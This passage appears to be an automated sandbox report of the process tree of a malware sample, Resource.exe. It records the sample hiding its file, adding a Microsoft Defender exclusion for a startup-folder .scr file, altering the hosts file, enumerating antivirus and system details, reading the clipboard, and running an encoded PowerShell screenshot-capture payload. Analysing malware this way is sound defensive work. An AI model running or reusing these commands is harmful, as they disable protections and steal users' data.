Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:18:02
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7832, Parent PID: 7820

General

Target ID:	28
Start time:	10:18:02
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:18:03
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\Desktop\Resource.exe"
Imagebase:	0x7ff75d3f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:18:04
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7196, Parent PID: 6048

General

Target ID:	38
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7348, Parent PID: 7196

General

Target ID:	39
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 5820, Parent PID: 6048

General

Target ID:	44
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:18:05
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6acf70000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff748520000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff78c900000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff78c900000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	10:18:07
Start date:	06/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff78c900000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:18:09
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 5804, Parent PID: 6048

General

Target ID:	65
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTA